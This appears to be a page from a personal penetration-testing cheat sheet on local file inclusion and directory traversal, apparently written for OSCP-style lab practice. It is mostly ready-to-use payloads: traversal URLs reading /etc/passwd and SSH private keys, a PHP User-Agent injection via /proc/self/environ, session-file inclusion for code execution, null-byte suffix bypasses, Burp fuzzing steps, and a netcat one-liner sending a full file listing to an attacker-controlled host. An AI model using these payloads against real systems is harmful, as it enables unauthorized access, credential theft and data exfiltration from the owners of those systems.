Pentest
  • Homepage
  • Pentest Links
  • 01 Prep
    • Target Inventory
    • OSINT and Dorks
    • Recon-ng dns zone snoop
    • ❤️Gitbook
  • 02 Scan
    • *Favorites
    • Burp
    • Dirb nikto wpscan etc
    • Enum Finger and Brute SSH
    • Fuzzing
    • Nmap
    • Open Port Checks OneLiner
    • Port Knocking
    • SSL Issues
    • Tcpdump
  • 03 Getting In
    • Char Evasion Tricks
    • Email SMTP
    • Eternal Blue
    • FTP
    • heartbleed
    • Metasploit
    • MySql
    • NFS
    • Oracle
    • Postgres
    • PowerShell Empire
    • Shells
    • rpc
    • SMB Samba
    • SSH Tips
    • SQLite3
    • Veil
  • 04 WebApps
    • Apache
    • Blogs
    • Coldfusion
    • Content Management (CMS)
    • Drupal
    • Elastix FreePBX
    • HttpFileServer (HFS)
    • IIS
    • IIS6 WebDav
    • Local File Inclusion (LFI)
    • Magento
    • Nagios
    • PFSense
    • php
    • php type juggling
    • phpLite
    • Web Injections
    • Javascript
    • Shellshock
    • SQL Injections (sqli)
    • SQLMap
    • WAF
    • Webmin
    • Web Scrape
    • Wordpress
  • 05 Passwords & Ciphers
    • Cipher Decrypt
    • Cipher RSA Wiener P-Q-E
    • Cracking
    • Dict Guess List Mangle
    • Get Hashes
    • Hydra Brutes
    • Images Exif Steg
    • Malware Analysis
    • Pull Hashes PCredz
    • SSH PrivKey Passphrase
    • Unzip Crack
    • Windows PW
  • 06 Linux PrivEsc
    • 1 Look Around
    • 2 Enums
    • 3 PrivEsc
    • 4 Kernel Exploits
    • 5 Looting
    • binaries
    • Buffer Overflow
    • bash prison
    • Monitor Files
    • mongodb node
    • Pivots
    • Remote Execute
    • Shell TTY Fix
    • TAR backups
    • Transfer Files
    • vnc
  • 07 Windows PrivEsc
    • 1 Windows cmd kungfu
    • 2 Enums
    • 3 PrivEsc
    • 4 Kernel Exploits
    • 5 Looting
    • Bloodhound
    • DLL Hijack MSF
    • Kerberos
    • Memory Analysis
    • NTDS
    • Powershell
    • Responder
    • Saved Creds runas
Powered by GitBook
On this page
  • Local File Inclusion
  • Automation
  • Whoami Home SSH:
  • Code exe with 'environ'
  • Fuzzing LFI
  • RFI from LFI (php cookies)
  • Directory Traversals
  • NULL BYTE
  • Netcat Tricks

Was this helpful?

  1. 04 WebApps

Local File Inclusion (LFI)

AKA: Directory Traversal

Local File Inclusion

  • If your path looks like a file/folder.. you might find an LFI

  • Keep trying combinations until you find one.

  • Or google/searchsploit a known LFI

  • REF: PhpTricks, WebInjections, PFSenseRemoteExec, CharEvasion

LFI Likely:
http://$IP/dept/manage.php?notes=files/nineveh.txt

Testing:
http://$IP/dept/manage.php?notes=files/../../../../etc/passwd
http://$IP/dept/manage.php?notes=files/../../../../../../../etc/passwd
http://$IP/dept/manage.php?notes=/myNotes/../../../etc/passwd

Automation

  • Automate LFI Enumeration/Discovery.

  • Good to add to the tool-belt when you're looking to see what sensitive files exists and are readable once you've found a LFI vulnerability. It also includes a Mode (ICE-Breaker) to scan a potential target using an encoded path traversal list - which helps in LFI discovery.

  • https://www.reddit.com/r/oscp/comments/9fxhbp/helpful_local_file_inclusion_tool_fi/

nikto ..might give you one (if known)
python fi-cyberscan.py -t http://$IP/cyber.php?page= -m1
fimap -u $IP  ..in kali

Whoami Home SSH:

whoami:
/proc/self/status  ..match 100:101 with /etc/passwd

Home directory:
/etc/passwd                    ..learn home path
/var/lib/asterisk/             ..check home path
/var/lib/asterisk/.ssh/id_rsa  ..priv ssh key here?

Code exe with 'environ'

  • If you have access to 'environ' - you might have code execution

  • Burp > Repeater > /proc/self/environ

graph.php?lang=../../../proc/self/environ%00&module=Accounts
User-Agent: <?php echo "hello"; ?>
Go

Fuzzing LFI

  • Burp > Intercept > Send to Intruder > Positions

  • Clear & Add: $attack$

  • https://github.com/tennc/fuzzdb/tree/master/dict/BURP-PayLoad/LFI

  • REF: Fuzzing

graph.php?lang=../../../etc/passwd%00&module=Accounts
graph.php?lang=../../../$attack$%00&module=Accounts
                           |
                         Keyword for fuzz

Payloads > Load > burp-fuzz > 
LFI-LogFileCheck.txt
LFI-InterstingFiles.txt

Start Attack
Sort by Length ..to see results

RFI from LFI (php cookies)

  • If you can locate the 'session' cookies

  • You may be able to inject them into Burp Repeater to get an Execution

cd vtiger/  ..if you have the source
grep -R phpinfo\(\)  
maybe: Image/Canvas/PDF.php  ..if we can access?
Find where session is saved:
ex: /tmp/sess_xyz123

Repeater:
graph.php?lang=../../../tmp/sess_xyz123%00&module=Accounts
Might give you execution

Directory Traversals

--------------------
--------------------
/images/./photo.jpg             .. ok
/images/../photo.jpg            .. error
/images/../images/photo.jpg     .. win!

http://abc.so/images/../photo.png                              ..ok
http://abc.so/images/../../../../../photo.png                  ..ok
http://abc.so/../../../../../../../../../../secret.key         ..nothing

http://abc.so/file.php?file=photo.png
http://abc.so/file.php?file=./photo.png                  .. added ./
http://abc.so/file.php?file=./file.php                   .. 'real' file.php
http://abc.so/file.php?file=./../../../../../etc/passwd  .. worked !!
http://abc.so/file.php?file=./../../../../../boot.ini    .. windows target !!


--------------------
--------------------
Filtered: Cant leave /var/www/ 

http://abc.so/
http://abc.so/file.php?file=/var/www/photo.png                           ..ok
http://abc.so/file.php?file=/secret.key                                  ..fail
http://abc.so/file.php?file=./../../../../../../../../photo.png          ..fail
http://abc.so/file.php?file=/var/www/file.php                            ..ok
http://abc.so/file.php?file=/var/www/../../../../../../../../etc/passwd  ..ok

NULL BYTE

  • %00 ..URL-encoded

  • Adding a NULL BYTE will get rid of suffix (on older systems)

  • Works well in Perl and older versions of PHP (solved since 5.3.4)

  • Scenario: Server is adding .png automatically to your page

http://abc.so/file.php?file=photo                 .. ok
http://abc.so/file.php?file=photo.png             .. nothing
http://abc.so/file.php?file=photo.png%00          .. ok
http://abc.so/file.php?file=file.php%00           .. ok
http://abc.so/file.php?file=/../../etc/passwd%00  .. win

Netcat Tricks

  • Find all files on host.. send to remote

  • REF: ReverseShell, CharEvasion, LFI

target: 
echo+abc+|nc+10.x.x.x:9000    ..test
find+/+|nc+10.x.x.x:9000      ..pull all files

kali:
nc -nvlp 9000 > findall.txt   ..receive
PreviousIIS6 WebDavNextMagento

Last updated 2 years ago

Was this helpful?